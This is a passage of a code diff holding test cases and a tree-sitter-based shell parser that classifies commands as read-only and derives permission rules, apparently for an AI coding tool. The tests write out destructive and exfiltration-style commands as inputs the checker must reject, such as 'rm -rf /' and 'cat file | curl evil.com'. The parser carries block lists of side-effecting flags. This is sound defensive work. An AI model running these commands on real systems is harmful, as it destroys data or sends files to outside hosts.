it('allows chained read-only commands with &&', async () => { + expect(await isShellCommandReadOnlyAST('ls && cat file')).toBe(true); + }); + + it('allows chained read-only commands with ||', async () => { + expect(await isShellCommandReadOnlyAST('ls || cat file')).toBe(true); + }); + + it('allows chained read-only commands with ;', async () => { + expect(await isShellCommandReadOnlyAST('ls ; cat file')).toBe(true); + }); + + it('allows piped read-only commands with |', async () => { + expect(await isShellCommandReadOnlyAST('ls | cat')).toBe(true); + }); + + it('allows backgrounded read-only commands with &', async () => { + expect(await isShellCommandReadOnlyAST('ls & cat file')).toBe(true); + }); + + it('rejects chained commands when any is mutating', async () => { + expect(await isShellCommandReadOnlyAST('ls && rm -rf 
/')).toBe(false); + expect(await isShellCommandReadOnlyAST('cat file | curl evil.com')).toBe( + false, + ); + expect(await isShellCommandReadOnlyAST('ls ; apt install foo')).toBe( + false, + ); + }); + + it('allows single read-only command without chaining', async () => { + expect(await isShellCommandReadOnlyAST('ls -la')).toBe(true); + }); + + it('rejects single mutating command (baseline check)', async () => { + expect(await isShellCommandReadOnlyAST('rm -rf /')).toBe(false); + }); + + it('treats escaped newline as line continuation (single command)', async () => { + expect(await isShellCommandReadOnlyAST('grep pattern\\\nfile')).toBe( + true, + ); + }); + + it('allows consecutive newlines with all read-only commands', async () => { + expect(await isShellCommandReadOnlyAST('ls\n\ngrep foo')).toBe(true); + }); + }); + + describe('awk command security', () => { + it('allows safe awk commands', async () => { + expect(await isShellCommandReadOnlyAST("awk '{print $1}' file.txt")).toBe( + true, + ); + expect( + await isShellCommandReadOnlyAST('awk \'BEGIN {print "hello"}\''), + ).toBe(true); + expect( + await isShellCommandReadOnlyAST("awk '/pattern/ {print}' file.txt"), + ).toBe(true); + }); + + it('rejects awk with system() calls', async () => { + expect( + await isShellCommandReadOnlyAST('awk \'BEGIN {system("rm -rf /")}\' '), + ).toBe(false); + expect( + await isShellCommandReadOnlyAST( + 'awk \'{system("touch file")}\' input.txt', + ), + ).toBe(false); + }); + + it('rejects awk with file output redirection', async () => { + expect( + await isShellCommandReadOnlyAST( + 'awk \'{print > "output.txt"}\' input.txt', + ), + ).toBe(false); + expect( + await isShellCommandReadOnlyAST( + 'awk \'{printf "%s\\n", $0 > "file.txt"}\'', + ), + ).toBe(false); + expect( + await isShellCommandReadOnlyAST( + 'awk \'{print >> "append.txt"}\' input.txt', + ), + ).toBe(false); + }); + + it('rejects awk with command pipes', async () => { + expect( + await isShellCommandReadOnlyAST('awk 
\'{print | "sort"}\' input.txt'), + ).toBe(false); + }); + + it('rejects awk with getline from commands', async () => { + expect( + await isShellCommandReadOnlyAST('awk \'BEGIN {getline < "date"}\''), + ).toBe(false); + expect( + await isShellCommandReadOnlyAST('awk \'BEGIN {"date" | getline}\''), + ).toBe(false); + }); + + it('rejects awk with close() calls', async () => { + expect( + await isShellCommandReadOnlyAST('awk \'BEGIN {close("file")}\''), + ).toBe(false); + }); + }); + + describe('sed command security', () => { + it('allows safe sed commands', async () => { + expect(await isShellCommandReadOnlyAST("sed 's/foo/bar/' file.txt")).toBe( + true, + ); + expect(await isShellCommandReadOnlyAST("sed -n '1,5p' file.txt")).toBe( + true, + ); + expect(await isShellCommandReadOnlyAST("sed '/pattern/d' file.txt")).toBe( + true, + ); + }); + + it('rejects sed with execute command', async () => { + expect( + await isShellCommandReadOnlyAST("sed 's/foo/bar/e' file.txt"), + ).toBe(false); + }); + + it('rejects sed with write command', async () => { + expect( + await isShellCommandReadOnlyAST( + "sed 's/foo/bar/w output.txt' file.txt", + ), + ).toBe(false); + }); + + it('rejects sed with read command', async () => { + expect( + await isShellCommandReadOnlyAST("sed 's/foo/bar/r input.txt' file.txt"), + ).toBe(false); + }); + + it('still rejects sed in-place editing', async () => { + expect( + await isShellCommandReadOnlyAST("sed -i 's/foo/bar/' file.txt"), + ).toBe(false); + expect( + await isShellCommandReadOnlyAST("sed --in-place 's/foo/bar/' file.txt"), + ).toBe(false); + }); + }); + + // ======================================================================= + // Additional AST-specific edge cases + // ======================================================================= + + describe('AST-specific edge cases', () => { + it('rejects backtick command substitution', async () => { + expect(await isShellCommandReadOnlyAST('echo `rm -rf /`')).toBe(false); + }); + + 
it('rejects process substitution with write', async () => { + // process_substitution is conservatively handled as command_substitution + expect(await isShellCommandReadOnlyAST('diff <(ls) <(ls -a)')).toBe( + false, + ); + }); + + it('allows pure variable assignment', async () => { + expect(await isShellCommandReadOnlyAST('FOO=bar')).toBe(true); + }); + + it('allows multiple env vars before command', async () => { + expect(await isShellCommandReadOnlyAST('A=1 B=2 ls -la')).toBe(true); + }); + + it('rejects function definitions', async () => { + expect(await isShellCommandReadOnlyAST('foo() { rm -rf /; }')).toBe( + false, + ); + }); + + it('allows git diff', async () => { + expect( + await isShellCommandReadOnlyAST( + 'git diff --word-diff=color -- file.txt', + ), + ).toBe(true); + }); + + it('allows git log', async () => { + expect(await isShellCommandReadOnlyAST('git log --oneline -10')).toBe( + true, + ); + }); + + it('rejects git push', async () => { + expect(await isShellCommandReadOnlyAST('git push origin main')).toBe( + false, + ); + }); + + it('allows git --version / --help', async () => { + expect(await isShellCommandReadOnlyAST('git --version')).toBe(true); + expect(await isShellCommandReadOnlyAST('git --help')).toBe(true); + }); + + it('allows input redirection (read-only)', async () => { + expect(await isShellCommandReadOnlyAST('cat < input.txt')).toBe(true); + }); + + it('rejects append redirection', async () => { + expect(await isShellCommandReadOnlyAST('echo hello >> out.txt')).toBe( + false, + ); + }); + + it('allows here-string', async () => { + expect(await isShellCommandReadOnlyAST('cat <<< "hello"')).toBe(true); + }); + + it('rejects nested command substitution', async () => { + expect(await isShellCommandReadOnlyAST('echo $(echo $(rm foo))')).toBe( + false, + ); + }); + + it('allows complex pipeline of read-only commands', async () => { + expect( + await isShellCommandReadOnlyAST( + 'find . 
-name "*.ts" | grep -v node_modules | sort | head -20', + ), + ).toBe(true); + }); + + it('rejects pipeline with mutating command', async () => { + expect( + await isShellCommandReadOnlyAST('find . -name "*.ts" | xargs rm'), + ).toBe(false); + }); + + it('allows git branch (no mutating flags)', async () => { + expect(await isShellCommandReadOnlyAST('git branch')).toBe(true); + expect(await isShellCommandReadOnlyAST('git branch -a')).toBe(true); + }); + + it('rejects git branch -d', async () => { + expect(await isShellCommandReadOnlyAST('git branch -d feature')).toBe( + false, + ); + }); + + it('allows git remote (no mutating action)', async () => { + expect(await isShellCommandReadOnlyAST('git remote -v')).toBe(true); + }); + + it('rejects git remote add', async () => { + expect(await isShellCommandReadOnlyAST('git remote add origin url')).toBe( + false, + ); + }); + }); +}); + +// ========================================================================= +// extractCommandRules +// ========================================================================= + +describe('extractCommandRules', () => { + describe('simple commands', () => { + it('extracts root + known subcommand + wildcard', async () => { + expect( + await extractCommandRules('git clone https://github.com/foo/bar.git'), + ).toEqual(['git clone *']); + }); + + it('extracts npm install with wildcard', async () => { + expect(await extractCommandRules('npm install express')).toEqual([ + 'npm install *', + ]); + }); + + it('extracts npm outdated without wildcard (no extra args)', async () => { + expect(await extractCommandRules('npm outdated')).toEqual([ + 'npm outdated', + ]); + }); + + it('extracts cat with wildcard', async () => { + expect(await extractCommandRules('cat /etc/passwd')).toEqual(['cat *']); + }); + + it('extracts ls with wildcard', async () => { + expect(await extractCommandRules('ls -la /tmp')).toEqual(['ls *']); + }); + + it('extracts bare command without args', async () => { + expect(await 
extractCommandRules('whoami')).toEqual(['whoami']); + }); + + it('extracts unknown command with wildcard', async () => { + expect(await extractCommandRules('curl https://example.com')).toEqual([ + 'curl *', + ]); + }); + + it('extracts command with only flags', async () => { + expect(await extractCommandRules('ls -la')).toEqual(['ls *']); + }); + }); + + describe('compound commands', () => { + it('extracts rules from && compound', async () => { + expect(await extractCommandRules('git clone foo && npm install')).toEqual( + ['git clone *', 'npm install'], + ); + }); + + it('extracts rules from || compound', async () => { + expect(await extractCommandRules('git pull || git fetch origin')).toEqual( + ['git pull', 'git fetch *'], + ); + }); + + it('extracts rules from ; compound', async () => { + expect(await extractCommandRules('ls ; cat file')).toEqual([ + 'ls', + 'cat *', + ]); + }); + + it('extracts rules from pipeline', async () => { + expect(await extractCommandRules('cat file | grep pattern')).toEqual([ + 'cat *', + 'grep *', + ]); + }); + + it('deduplicates rules', async () => { + expect( + await extractCommandRules('npm install foo && npm install bar'), + ).toEqual(['npm install *']); + }); + }); + + describe('docker multi-level subcommands', () => { + it('extracts docker compose up with args', async () => { + expect(await extractCommandRules('docker compose up -d')).toEqual([ + 'docker compose up *', + ]); + }); + + it('extracts docker compose up without args', async () => { + expect(await extractCommandRules('docker compose up')).toEqual([ + 'docker compose up', + ]); + }); + + it('extracts docker run with wildcard', async () => { + expect(await extractCommandRules('docker run -it ubuntu bash')).toEqual([ + 'docker run *', + ]); + }); + }); + + describe('edge cases', () => { + it('returns empty for empty string', async () => { + expect(await extractCommandRules('')).toEqual([]); + }); + + it('returns empty for whitespace', async () => { + expect(await 
extractCommandRules(' ')).toEqual([]); + }); + + it('handles env var prefix', async () => { + expect(await extractCommandRules('FOO=bar npm install')).toEqual([ + 'npm install', + ]); + }); + + it('handles redirected command', async () => { + expect(await extractCommandRules('echo hello > out.txt')).toEqual([ + 'echo *', + ]); + }); + + it('handles pure variable assignment (no rule)', async () => { + expect(await extractCommandRules('FOO=bar')).toEqual([]); + }); + + it('extracts cargo subcommands', async () => { + expect(await extractCommandRules('cargo build --release')).toEqual([ + 'cargo build *', + ]); + }); + + it('extracts kubectl subcommands', async () => { + expect(await extractCommandRules('kubectl get pods -n default')).toEqual([ + 'kubectl get *', + ]); + }); + + it('extracts pip install', async () => { + expect(await extractCommandRules('pip install requests')).toEqual([ + 'pip install *', + ]); + }); + + it('extracts pnpm subcommands', async () => { + expect(await extractCommandRules('pnpm add -D typescript')).toEqual([ + 'pnpm add *', + ]); + }); + }); +}); diff --git a/packages/core/src/utils/shellAstParser.ts b/packages/core/src/utils/shellAstParser.ts new file mode 100644 index 000000000..7b5e5d2b2 --- /dev/null +++ b/packages/core/src/utils/shellAstParser.ts @@ -0,0 +1,1086 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * Shell AST Parser — powered by web-tree-sitter + tree-sitter-bash. + * + * Provides: + * 1. `initParser()` – lazy singleton Parser initialisation + * 2. `parseShellCommand()` – parse a command string into a tree-sitter Tree + * 3. `isShellCommandReadOnlyAST()` – AST-based read-only command detection + * 4. 
`extractCommandRules()` – extract minimum-scope wildcard permission rules
 */

import Parser from 'web-tree-sitter';
import path from 'node:path';
import { fileURLToPath } from 'node:url';

// ---------------------------------------------------------------------------
// Constants
// ---------------------------------------------------------------------------

// Absolute file path and directory of this module (ESM has no __filename /
// __dirname globals, so they are derived from import.meta.url).
const __filename_ = fileURLToPath(import.meta.url);
const __dirname_ = path.dirname(__filename_);

/**
 * Root commands considered read-only by default (no sub-command analysis needed
 * unless explicitly listed in COMMANDS_WITH_SUBCOMMANDS).
 */
const READ_ONLY_ROOT_COMMANDS = new Set([
  'awk',
  'basename',
  'cat',
  'cd',
  'column',
  'cut',
  'df',
  'dirname',
  'du',
  'echo',
  'env',
  'find',
  'git',
  'grep',
  'head',
  'less',
  'ls',
  'more',
  'printenv',
  'printf',
  'ps',
  'pwd',
  'rg',
  'ripgrep',
  'sed',
  'sort',
  'stat',
  'tail',
  'tree',
  'uniq',
  'wc',
  'which',
  'where',
  'whoami',
]);

/** Git sub-commands considered read-only. */
const READ_ONLY_GIT_SUBCOMMANDS = new Set([
  'blame',
  'branch',
  'cat-file',
  'diff',
  'grep',
  'log',
  'ls-files',
  'remote',
  'rev-parse',
  'show',
  'status',
  'describe',
]);

/**
 * git remote actions that mutate state.
 * `rm` is the documented alias of `remove`; `set-head` and `set-branches`
 * rewrite remote-tracking configuration.
 */
const BLOCKED_GIT_REMOTE_ACTIONS = new Set([
  'add',
  'remove',
  'rm',
  'rename',
  'set-url',
  'set-head',
  'set-branches',
  'prune',
  'update',
]);

/**
 * git branch flags that mutate state.
 * Matched case-sensitively by the caller, so lower- and upper-case variants
 * (`-m` / `-M`, `-c` / `-C`) are listed separately.
 */
const BLOCKED_GIT_BRANCH_FLAGS = new Set([
  '-d',
  '-D',
  '--delete',
  '--move',
  '-m',
  '-M',
  '--copy',
  '-c',
  '-C',
  '--force',
  '-f',
  '--set-upstream-to',
  '-u',
  '--unset-upstream',
  '--edit-description',
]);

/** find flags that have side-effects. `-fls` writes its listing to a file. */
const BLOCKED_FIND_FLAGS = new Set([
  '-delete',
  '-exec',
  '-execdir',
  '-ok',
  '-okdir',
  '-fls',
]);

const BLOCKED_FIND_PREFIXES = ['-fprint', '-fprintf'];

/** sed flags that cause in-place editing. */
const BLOCKED_SED_PREFIXES = ['-i'];

/** AWK side-effect patterns that can execute commands or write files.
*/ +const AWK_SIDE_EFFECT_PATTERNS = [ + /system\s*\(/, + /print\s+[^>|]*>\s*"[^"]*"/, + /printf\s+[^>|]*>\s*"[^"]*"/, + /print\s+[^>|]*>>\s*"[^"]*"/, + /printf\s+[^>|]*>>\s*"[^"]*"/, + /print\s+[^|]*\|\s*"[^"]*"/, + /printf\s+[^|]*\|\s*"[^"]*"/, + /getline\s*<\s*"[^"]*"/, + /"[^"]*"\s*\|\s*getline/, + /close\s*\(/, +]; + +/** SED side-effect patterns. */ +const SED_SIDE_EFFECT_PATTERNS = [ + /[^\\]e\s/, + /^e\s/, + /[^\\]w\s/, + /^w\s/, + /[^\\]r\s/, + /^r\s/, +]; + +/** + * Write-redirection operators in file_redirect nodes. + * Input-only redirections (`<`, `<<`, `<<<`) are safe. + */ +const WRITE_REDIRECT_OPERATORS = new Set(['>', '>>', '&>', '&>>', '>|']); + +/** + * Map of root command → known sub-command sets. + * Used by `extractCommandRules()` to identify sub-commands vs arguments. + */ +const KNOWN_SUBCOMMANDS: Record> = { + git: new Set([ + 'add', + 'am', + 'archive', + 'bisect', + 'blame', + 'branch', + 'bundle', + 'cat-file', + 'checkout', + 'cherry-pick', + 'clean', + 'clone', + 'commit', + 'config', + 'describe', + 'diff', + 'fetch', + 'format-patch', + 'gc', + 'grep', + 'init', + 'log', + 'ls-files', + 'ls-remote', + 'merge', + 'mv', + 'notes', + 'pull', + 'push', + 'range-diff', + 'rebase', + 'reflog', + 'remote', + 'reset', + 'restore', + 'revert', + 'rev-parse', + 'rm', + 'shortlog', + 'show', + 'stash', + 'status', + 'submodule', + 'switch', + 'tag', + 'worktree', + ]), + npm: new Set([ + 'access', + 'adduser', + 'audit', + 'bugs', + 'cache', + 'ci', + 'completion', + 'config', + 'create', + 'dedupe', + 'deprecate', + 'diff', + 'dist-tag', + 'docs', + 'doctor', + 'edit', + 'exec', + 'explain', + 'explore', + 'find-dupes', + 'fund', + 'help', + 'hook', + 'init', + 'install', + 'install-ci-test', + 'install-test', + 'link', + 'login', + 'logout', + 'ls', + 'org', + 'outdated', + 'owner', + 'pack', + 'ping', + 'pkg', + 'prefix', + 'profile', + 'prune', + 'publish', + 'query', + 'rebuild', + 'repo', + 'restart', + 'root', + 'run', + 'run-script', + 
'search', + 'set-script', + 'shrinkwrap', + 'star', + 'stars', + 'start', + 'stop', + 'team', + 'test', + 'token', + 'uninstall', + 'unpublish', + 'unstar', + 'update', + 'version', + 'view', + 'whoami', + ]), + yarn: new Set([ + 'add', + 'autoclean', + 'bin', + 'cache', + 'check', + 'config', + 'create', + 'generate-lock-entry', + 'global', + 'help', + 'import', + 'info', + 'init', + 'install', + 'licenses', + 'link', + 'list', + 'login', + 'logout', + 'outdated', + 'owner', + 'pack', + 'policies', + 'publish', + 'remove', + 'run', + 'tag', + 'team', + 'test', + 'unlink', + 'unplug', + 'upgrade', + 'upgrade-interactive', + 'version', + 'versions', + 'why', + 'workspace', + 'workspaces', + ]), + pnpm: new Set([ + 'add', + 'audit', + 'create', + 'dedupe', + 'deploy', + 'dlx', + 'env', + 'exec', + 'fetch', + 'import', + 'init', + 'install', + 'install-test', + 'licenses', + 'link', + 'list', + 'ls', + 'outdated', + 'pack', + 'patch', + 'patch-commit', + 'prune', + 'publish', + 'rebuild', + 'remove', + 'root', + 'run', + 'server', + 'setup', + 'store', + 'test', + 'uninstall', + 'unlink', + 'update', + 'why', + ]), + docker: new Set([ + 'attach', + 'build', + 'commit', + 'compose', + 'container', + 'context', + 'cp', + 'create', + 'diff', + 'events', + 'exec', + 'export', + 'history', + 'image', + 'images', + 'import', + 'info', + 'inspect', + 'kill', + 'load', + 'login', + 'logout', + 'logs', + 'manifest', + 'network', + 'node', + 'pause', + 'plugin', + 'port', + 'ps', + 'pull', + 'push', + 'rename', + 'restart', + 'rm', + 'rmi', + 'run', + 'save', + 'search', + 'secret', + 'service', + 'stack', + 'start', + 'stats', + 'stop', + 'swarm', + 'system', + 'tag', + 'top', + 'trust', + 'unpause', + 'update', + 'version', + 'volume', + 'wait', + ]), + pip: new Set([ + 'install', + 'download', + 'uninstall', + 'freeze', + 'inspect', + 'list', + 'show', + 'check', + 'config', + 'search', + 'cache', + 'index', + 'wheel', + 'hash', + 'completion', + 'debug', + 'help', + ]), + 
pip3: new Set([ + 'install', + 'download', + 'uninstall', + 'freeze', + 'inspect', + 'list', + 'show', + 'check', + 'config', + 'search', + 'cache', + 'index', + 'wheel', + 'hash', + 'completion', + 'debug', + 'help', + ]), + cargo: new Set([ + 'add', + 'bench', + 'build', + 'check', + 'clean', + 'clippy', + 'doc', + 'fetch', + 'fix', + 'fmt', + 'generate-lockfile', + 'init', + 'install', + 'locate-project', + 'login', + 'metadata', + 'new', + 'owner', + 'package', + 'pkgid', + 'publish', + 'read-manifest', + 'remove', + 'report', + 'run', + 'rustc', + 'rustdoc', + 'search', + 'test', + 'tree', + 'uninstall', + 'update', + 'vendor', + 'verify-project', + 'version', + 'yank', + ]), + kubectl: new Set([ + 'annotate', + 'api-resources', + 'api-versions', + 'apply', + 'attach', + 'auth', + 'autoscale', + 'certificate', + 'cluster-info', + 'completion', + 'config', + 'cordon', + 'cp', + 'create', + 'debug', + 'delete', + 'describe', + 'diff', + 'drain', + 'edit', + 'events', + 'exec', + 'explain', + 'expose', + 'get', + 'kustomize', + 'label', + 'logs', + 'patch', + 'plugin', + 'port-forward', + 'proxy', + 'replace', + 'rollout', + 'run', + 'scale', + 'set', + 'taint', + 'top', + 'uncordon', + 'version', + 'wait', + ]), + make: new Set([]), // make targets are positional, not subcommands +}; + +/** Docker multi-level sub-command support (e.g., `docker compose up`). 
*/
const DOCKER_COMPOSE_SUBCOMMANDS = new Set([
  'build',
  'config',
  'cp',
  'create',
  'down',
  'events',
  'exec',
  'images',
  'kill',
  'logs',
  'ls',
  'pause',
  'port',
  'ps',
  'pull',
  'push',
  'restart',
  'rm',
  'run',
  'start',
  'stop',
  'top',
  'unpause',
  'up',
  'version',
  'wait',
  'watch',
]);

// ---------------------------------------------------------------------------
// Parser Singleton
// ---------------------------------------------------------------------------

// Fully configured parser; stays null until the bash grammar has been loaded
// AND attached, so a non-null value always means "ready to parse".
let parserInstance: Parser | null = null;
let bashLanguage: Parser.Language | null = null;
// In-flight initialisation, shared by concurrent initParser() callers.
let initPromise: Promise<void> | null = null;

/**
 * Resolve the path to a WASM file inside vendor/tree-sitter/.
 * Handles three deployment scenarios:
 *   - Source (src/utils/*.ts): 2 levels up to package root
 *   - Transpiled (dist/src/utils/*.js): 3 levels up
 *   - Bundle (dist/cli.js): vendor at same level (0 levels)
 *
 * @param filename Name of the WASM file (e.g. `tree-sitter.wasm`).
 * @returns Path to the file, built relative to this module's directory.
 */
function resolveWasmPath(filename: string): string {
  const inSrcUtils = __filename_.includes(path.join('src', 'utils'));
  const levelsUp = !inSrcUtils ? 0 : __filename_.endsWith('.ts') ? 2 : 3;
  return path.join(
    __dirname_,
    ...Array(levelsUp).fill('..'),
    'vendor',
    'tree-sitter',
    filename,
  );
}

/**
 * Initialise the tree-sitter Parser singleton.
 * Safe to call multiple times – only the first call does real work, and
 * concurrent callers share the same in-flight promise.
 *
 * If initialisation fails (e.g. a WASM file cannot be loaded) the cached
 * promise is cleared so that a later call can retry, and no half-configured
 * parser is ever published.
 *
 * @returns A promise that resolves once the parser is ready to use.
 */
export async function initParser(): Promise<void> {
  if (parserInstance) return;
  if (initPromise) return initPromise;

  initPromise = (async () => {
    try {
      const treeSitterWasm = resolveWasmPath('tree-sitter.wasm');
      await Parser.init({
        locateFile: () => treeSitterWasm,
      });
      const parser = new Parser();
      const language = await Parser.Language.load(
        resolveWasmPath('tree-sitter-bash.wasm'),
      );
      parser.setLanguage(language);
      // Publish only after the grammar is attached: the fast path above
      // treats a non-null parserInstance as fully initialised.
      bashLanguage = language;
      parserInstance = parser;
    } catch (error) {
      // Do not cache the rejection – allow the next caller to try again.
      initPromise = null;
      throw error;
    }
  })();

  return initPromise;
}

/**
 * Parse a shell command string into a tree-sitter Tree.
 * Initialises the parser lazily if needed.
*/
export async function parseShellCommand(command: string): Promise<Parser.Tree> {
  await initParser();
  return parserInstance!.parse(command);
}

// ---------------------------------------------------------------------------
// AST Helpers
// ---------------------------------------------------------------------------

type SyntaxNode = Parser.SyntaxNode;

/**
 * Collect all descendant nodes of given types.
 *
 * The starting node itself is included when its type matches. Traversal is an
 * explicit-stack depth-first walk; children are pushed in reverse so results
 * come out in source (pre-order) order.
 *
 * @param node Root of the subtree to search.
 * @param types Node type names to collect.
 * @returns Matching nodes in pre-order.
 */
function collectDescendants(
  node: SyntaxNode,
  types: Set<string>,
): SyntaxNode[] {
  const result: SyntaxNode[] = [];
  const stack: SyntaxNode[] = [node];
  while (stack.length > 0) {
    const current = stack.pop()!;
    if (types.has(current.type)) {
      result.push(current);
    }
    for (let i = current.childCount - 1; i >= 0; i--) {
      stack.push(current.child(i)!);
    }
  }
  return result;
}

/**
 * Check if a tree contains any command_substitution or process_substitution node.
 * Stops at the first match instead of collecting every occurrence.
 */
function containsCommandSubstitutionAST(node: SyntaxNode): boolean {
  const stack: SyntaxNode[] = [node];
  while (stack.length > 0) {
    const current = stack.pop()!;
    if (
      current.type === 'command_substitution' ||
      current.type === 'process_substitution'
    ) {
      return true;
    }
    for (let i = 0; i < current.childCount; i++) {
      stack.push(current.child(i)!);
    }
  }
  return false;
}

/**
 * Check if a redirected_statement contains a write-redirection.
 *
 * Only the direct `file_redirect` children of the statement are inspected.
 * Besides the operators in WRITE_REDIRECT_OPERATORS, `>&` is treated as a
 * write when its target is a file name (`cmd >& out.txt`); it stays harmless
 * when the target is a descriptor number or `-` (`2>&1`, `>&-`).
 *
 * @returns `true` if at least one redirect writes to a file; `false` for any
 *          node that is not a `redirected_statement`.
 */
function hasWriteRedirection(node: SyntaxNode): boolean {
  if (node.type !== 'redirected_statement') return false;
  for (let i = 0; i < node.childCount; i++) {
    const child = node.child(i)!;
    if (child.type !== 'file_redirect') continue;
    // The operator is the first non-descriptor child
    for (let j = 0; j < child.childCount; j++) {
      const op = child.child(j)!;
      if (op.type === 'file_descriptor') continue;
      // operator token
      if (WRITE_REDIRECT_OPERATORS.has(op.type)) return true;
      if (op.type === '>&') {
        // Descriptor duplication (`>&1`, `>&2-`, `>&-`) does not touch the
        // file system; any other target is a file being written.
        const target = child.child(j + 1)?.text ?? '';
        if (target !== '' && !/^\d+-?$|^-$/.test(target)) return true;
      }
      break; // only check the operator position
    }
  }
  return false;
}

/**
 * Extract the command_name text from a `command` node.
 * Handles leading variable_assignment(s) gracefully.
*/
function getCommandName(commandNode: SyntaxNode): string | null {
  const nameField = commandNode.childForFieldName('name');
  // No `name` field → nothing to report; otherwise return the lower-cased text.
  return nameField ? nameField.text.toLowerCase() : null;
}

/**
 * Gather the children of a `command` node whose field name is `argument`,
 * preserving their order of appearance.
 */
function getArgumentNodes(commandNode: SyntaxNode): SyntaxNode[] {
  const collected: SyntaxNode[] = [];
  let position = 0;
  while (position < commandNode.childCount) {
    if (commandNode.fieldNameForChild(position) === 'argument') {
      collected.push(commandNode.child(position)!);
    }
    position += 1;
  }
  return collected;
}

/**
 * Remove one pair of matching outer quotes (single or double) from a token.
 * Argument text coming from tree-sitter still carries its quotes
 * (e.g., `'s/foo/bar/e'`); pattern matching needs the bare content.
 * Text without a matching pair of outer quotes is returned unchanged.
 */
function stripOuterQuotes(text: string): string {
  if (text.length < 2) return text;

  const first = text[0];
  const last = text[text.length - 1];
  const singleQuoted = first === "'" && last === "'";
  const doubleQuoted = first === '"' && last === '"';

  return singleQuoted || doubleQuoted ? text.slice(1, -1) : text;
}

// ---------------------------------------------------------------------------
// Read-Only Analysis (per-command)
// ---------------------------------------------------------------------------

/**
 * Evaluate whether a single `command` node (simple command) is read-only.
*/
function evaluateCommandReadOnly(commandNode: SyntaxNode): boolean {
  const root = getCommandName(commandNode);
  if (!root) return true; // pure variable assignment
  const argNodes = getArgumentNodes(commandNode);
  const argTexts = argNodes.map((n) => stripOuterQuotes(n.text));

  if (!READ_ONLY_ROOT_COMMANDS.has(root)) return false;

  // Command-specific analysis
  if (root === 'git') return evaluateGitReadOnly(argTexts);
  if (root === 'find') return evaluateFindReadOnly(argTexts);
  if (root === 'sed') return evaluateSedReadOnly(argTexts);
  if (root === 'awk') return evaluateAwkReadOnly(argTexts);
  if (root === 'env') return evaluateEnvReadOnly(argTexts);

  return true;
}

/**
 * `git` is read-only when it is invoked with only global flags, with
 * `--version` / `--help`, or with a sub-command from
 * READ_ONLY_GIT_SUBCOMMANDS that carries no blocked action/flag.
 */
function evaluateGitReadOnly(args: string[]): boolean {
  // Skip global flags to find subcommand
  let idx = 0;
  while (idx < args.length && args[idx]!.startsWith('-')) {
    const flag = args[idx]!.toLowerCase();
    if (flag === '--version' || flag === '--help') return true;
    idx++;
  }
  if (idx >= args.length) return true; // `git` with only flags

  const subcommand = args[idx]!.toLowerCase();
  if (!READ_ONLY_GIT_SUBCOMMANDS.has(subcommand)) return false;

  const rest = args.slice(idx + 1);
  if (subcommand === 'remote') {
    return !rest.some((a) => BLOCKED_GIT_REMOTE_ACTIONS.has(a.toLowerCase()));
  }
  if (subcommand === 'branch') {
    // Case-sensitive on purpose: `-d` and `-D` are distinct flags.
    return !rest.some((a) => BLOCKED_GIT_BRANCH_FLAGS.has(a));
  }
  return true;
}

/** `find` is read-only unless one of its arguments is a side-effecting action. */
function evaluateFindReadOnly(args: string[]): boolean {
  for (const arg of args) {
    const lower = arg.toLowerCase();
    if (BLOCKED_FIND_FLAGS.has(lower)) return false;
    if (BLOCKED_FIND_PREFIXES.some((p) => lower.startsWith(p))) return false;
  }
  return true;
}

/**
 * `sed` is read-only unless it edits in place or its script matches one of
 * SED_SIDE_EFFECT_PATTERNS.
 *
 * In-place editing is detected in all of its spellings: `-i`, `-i.bak`,
 * clustered short options such as `-ni` / `-Ei`, `--in-place` and
 * `--in-place=SUFFIX`. The cluster check is deliberately conservative: any
 * single-dash argument whose leading letters contain `i` is rejected.
 */
function evaluateSedReadOnly(args: string[]): boolean {
  for (const arg of args) {
    if (BLOCKED_SED_PREFIXES.some((p) => arg.startsWith(p))) return false;
    if (arg.startsWith('--in-place')) return false;
    if (!arg.startsWith('--') && /^-[A-Za-z]*i/.test(arg)) return false;
  }
  const scriptContent = args.join(' ');
  return !SED_SIDE_EFFECT_PATTERNS.some((p) => p.test(scriptContent));
}

/** `awk` is read-only unless its arguments match one of AWK_SIDE_EFFECT_PATTERNS. */
function evaluateAwkReadOnly(args: string[]): boolean {
  const scriptContent = args.join(' ');
  return !AWK_SIDE_EFFECT_PATTERNS.some((p) => p.test(scriptContent));
}

/**
 * `env` only prints the environment when it is given nothing but
 * `NAME=value` operands (or the `-0` / `--null` output flag). Any other
 * operand is either a command that `env` would execute (`env rm -rf /`) or an
 * option this checker does not model, so it is conservatively rejected.
 */
function evaluateEnvReadOnly(args: string[]): boolean {
  return args.every(
    (arg) =>
      arg === '-0' ||
      arg === '--null' ||
      /^[A-Za-z_][A-Za-z0-9_]*=/.test(arg),
  );
}

/**
 * Check whether a `command` node carries a write redirect of its own.
 *
 * NOTE(review): some tree-sitter-bash grammar versions appear to attach a
 * leading redirect (`>out.txt ls`) to the `command` node rather than wrapping
 * it in a `redirected_statement` – confirm against the vendored grammar. The
 * check is harmless when no such node exists.
 */
function commandHasWriteRedirect(commandNode: SyntaxNode): boolean {
  const redirects = collectDescendants(commandNode, new Set(['file_redirect']));
  for (const redirect of redirects) {
    for (let i = 0; i < redirect.childCount; i++) {
      const token = redirect.child(i)!;
      if (token.type === 'file_descriptor') continue;
      if (WRITE_REDIRECT_OPERATORS.has(token.type)) return true;
      break; // only the operator position matters
    }
  }
  return false;
}

// ---------------------------------------------------------------------------
// Statement-level read-only analysis
// ---------------------------------------------------------------------------

/**
 * Recursively evaluate whether a statement AST node is read-only.
 *
 * Handles: command, pipeline, list, redirected_statement, subshell,
 * variable_assignment, negated_command, and compound statements.
 * Anything that is not explicitly recognised is treated as NOT read-only.
 *
 * @param node The statement node to evaluate.
 * @returns `true` only if every part of the statement is read-only.
 */
function evaluateStatementReadOnly(node: SyntaxNode): boolean {
  switch (node.type) {
    case 'command':
      // Check for command substitution anywhere inside the command
      if (containsCommandSubstitutionAST(node)) return false;
      if (commandHasWriteRedirect(node)) return false;
      return evaluateCommandReadOnly(node);

    case 'pipeline':
    case 'list':
    case 'subshell':
    case 'compound_statement': {
      // Pipelines, && / || lists, ( ... ) and { ...; } are read-only only if
      // every named child statement is.
      for (const child of node.namedChildren) {
        if (!evaluateStatementReadOnly(child)) return false;
      }
      return true;
    }

    case 'redirected_statement': {
      // Write redirections make it non-read-only
      if (hasWriteRedirection(node)) return false;
      // Redirect targets, here-strings and heredoc bodies are siblings of the
      // body, so a substitution there (`cat < $(rm x)`) is invisible to the
      // per-command check – scan the whole statement.
      if (containsCommandSubstitutionAST(node)) return false;
